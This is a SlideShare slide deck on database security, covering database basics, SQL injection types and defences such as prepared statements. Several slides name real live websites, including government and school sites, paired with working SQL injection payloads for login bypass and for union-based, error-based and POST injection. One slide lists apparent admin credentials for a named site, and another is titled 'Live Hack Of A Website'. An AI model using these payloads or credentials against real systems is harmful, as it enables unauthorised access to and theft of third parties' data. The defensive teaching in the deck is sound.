DATABASE & DATABASE
SECURITY
BY
REHAN MANZOOR
What actually is a database
 Code and Filing concept
+
History of Database
Major Database Vendors
Interaction with Database
How we Interact (Direct
Queries)
Custom defined functions
Stored Procedures
Stored Procedures
Integration with Languages
Static Apps
Dynamic Apps
Need in CMS
How We Integrate
 Well that is the real question how we
integrate.. It create a problem when we don‘t
attach app with a d...
Contents continued..
 Database Attacks
 What is a Database Attack
 Explanation
 OWASP Rating (damage rate)
 Destructi...
Database Attacks
 Excessive Privileges
 Privileges abuse
 Unauthorized privilege elevation
 Platform Vulnerabilities
...
Top 10 vuln by OWASP
Destruction of SQL Injection
Attack
 Heartland Payment Systems
This New Jersey payment processing firm lost
data on tens ...
Recent Bidding in Underground
Login on Live Sites
 http://www.equinet.ch/fr/gestion/login.php
 1' OR '1'='1
 http://lionsclubofwashim.co.in/admin.php...
Union based attack
 http://greenforce.com.pk/page.aspx?page_id=24
+UNION+ALL+SELECT+null,null,@@version,null,null,null,nu...
Error Based Attack
 http://www.vdjs.edu.in/CMS/ContentPage.aspx?id=21 and @@version>1-- -
 http://www.mission-education....
Blind Attack
 fgcineplex.com.sg/Images/slideshow/sizzlings
oul.php
 Code
well query is same here like union but problem
...
POST Sql Injection
 url:
 http://haryanapolice.gov.in/police/pressreleases/s
earch.asp
 Post
 text1=rummy'&text2=11/11...
Why Sql Injection Possible
 Who is responsible Database or Programmer
 Why Not To Blame Database
 Database Secure Natur...
Detection of SQL Injection
 Manual Check
 Why
 How
 By Whom
 Automated Check
 Tools
 Scanners
Securing From SQL Injection
 Learn About it
 Firewalls
 By Code
 Don‘t Disclose any parameter as possible
 Giving ses...
More on Firewalls
 USE Of Firewall
 As it is
 Customized
 Buffer overflows
 Null bytes
 Difference between a normal ...
Buffer Overflows
 Live example
 https://www.qmensolutions.com/remote_suppo
rt_packs.php?packs=9%27--%20-
 Bypassing fro...
Live Hack Of A Website
 http://aquaservices.co.in/
Conclusion
 Although databases and their contents are
vulnerable to a host of internal and external
threats, it is possib...
Database and Database Security..
Upcoming SlideShare
Loading in...5
×

Database and Database Security..

1,192

Published on

Database and Database Security..

Published in: Technology
2 Comments
7 Likes
Statistics
Notes
No Downloads
Views
Total Views
1,192
On Slideshare
0
From Embeds
0
Number of Embeds
5
Actions
Shares
0
Downloads
39
Comments
2
Likes
7
Embeds 0
No embeds

No notes for slide

Database and Database Security..

  1. 1. DATABASE & DATABASE SECURITY BY REHAN MANZOOR
  2. 2. What actually is a database  Code and Filing concept +
  3. 3. History of Database
  4. 4. Major Database Vendors
  5. 5. Interaction with Database
  6. 6. How we Interact (Direct Queries)
  7. 7. Custom defined functions
  8. 8. Stored Procedures
  9. 9. Stored Procedures
  10. 10. Integration with Languages
  11. 11. Static Apps
  12. 12. Dynamic Apps
  13. 13. Need in CMS
  14. 14. How We Integrate  Well that is the real question how we integrate.. It create a problem when we don‘t attach app with a database correctly.. Code is important
  15. 15. Contents continued..  Database Attacks  What is a Database Attack  Explanation  OWASP Rating (damage rate)  Destruction of SQL injection  History Reviews  Recent bidding in underground
  16. 16. Database Attacks  Excessive Privileges  Privileges abuse  Unauthorized privilege elevation  Platform Vulnerabilities  Sql Injection  Weak Audit  Denial of Service
  17. 17. Top 10 vuln by OWASP
  18. 18. Destruction of SQL Injection Attack  Heartland Payment Systems This New Jersey payment processing firm lost data on tens of millions of credit cards in an attack in 2009. Around 175,000 businesses were affected by the theft.  TJX More than 45 million people had their credit card details stolen and some experts said the actual figure was likely to be closer to 94 million.
  19. 19. Recent Bidding in Underground
  20. 20. Login on Live Sites  http://www.equinet.ch/fr/gestion/login.php  1' OR '1'='1  http://lionsclubofwashim.co.in/admin.php  1' OR '1'='1  admin.axilbusiness.in  1' OR '1'='1  http://www.anemos.in/admin/  1' OR '1'='1  Query Code  CODE select username, password from admin where username='"+txtUserName.Text+"' and password='"+txtPassword.Text+"';
  21. 21. Union based attack  http://greenforce.com.pk/page.aspx?page_id=24 +UNION+ALL+SELECT+null,null,@@version,null,null,null,nul l-- -  http://www.philatourism.com/page.aspx?id=-3 UNION ALL SELECT table_name,null,null,null,null,null from information_schema.tables—  http://www.sharan.org.uk/newsdetail.aspx?ID=-7 union all select '1',null –  Code select * from tblName where id=‗‖+RequestQueryString[‗id‘]+‖‘;
  22. 22. Error Based Attack  http://www.vdjs.edu.in/CMS/ContentPage.aspx?id=21 and @@version>1-- -  http://www.mission-education.org/resourcelist.cfm?audience_ID=5 and 1=convert(int,@@version)-- -&category_id=2  http://www.grabbbit.com/Product.aspx?console_id=3' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='adminlogin' and column_name not in ('id','userid','password','admin_role_id')))--&type=Preown  http://www.grabbbit.com/admin/login.aspx  userid admin  password grabbbit$  Code  Select column1,column2,column3, from table1 join table2 on table1.column1 = table2.column1 where id=‗‖+RequestQueryString[‗id‘]+‖‘;
  23. 23. Blind Attack  fgcineplex.com.sg/Images/slideshow/sizzlings oul.php  Code well query is same here like union but problem is with labels here.. Their designer could are not picked.. Either they are also stored in database or they they cannot work with union
  24. 24. POST Sql Injection  url:  http://haryanapolice.gov.in/police/pressreleases/s earch.asp  Post  text1=rummy'&text2=11/11/2010&SUBMIT=search  Code select * from tablename where text1= Request.Form[―text1"].ToString() and text2= Request.Form[―text1"].ToString();
  25. 25. Why Sql Injection Possible  Who is responsible Database or Programmer  Why Not To Blame Database  Database Secure Nature  Lack of awareness  No research base study  Lack of interest  Non professional coders
  26. 26. Detection of SQL Injection  Manual Check  Why  How  By Whom  Automated Check  Tools  Scanners
  27. 27. Securing From SQL Injection  Learn About it  Firewalls  By Code  Don‘t Disclose any parameter as possible  Giving session user least possible rights  Blacklisting evil keywords for the session user  User input validation  Using prepared statements
  28. 28. More on Firewalls  USE Of Firewall  As it is  Customized  Buffer overflows  Null bytes  Difference between a normal user and Hacker
  29. 29. Buffer Overflows  Live example  https://www.qmensolutions.com/remote_suppo rt_packs.php?packs=9%27--%20-  Bypassing from keyword
  30. 30. Live Hack Of A Website  http://aquaservices.co.in/
  31. 31. Conclusion  Although databases and their contents are vulnerable to a host of internal and external threats, it is possible to reduce the attack vectors to near zero. By addressing these threats you will meet the requirements of the most regulated industries in the world.
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×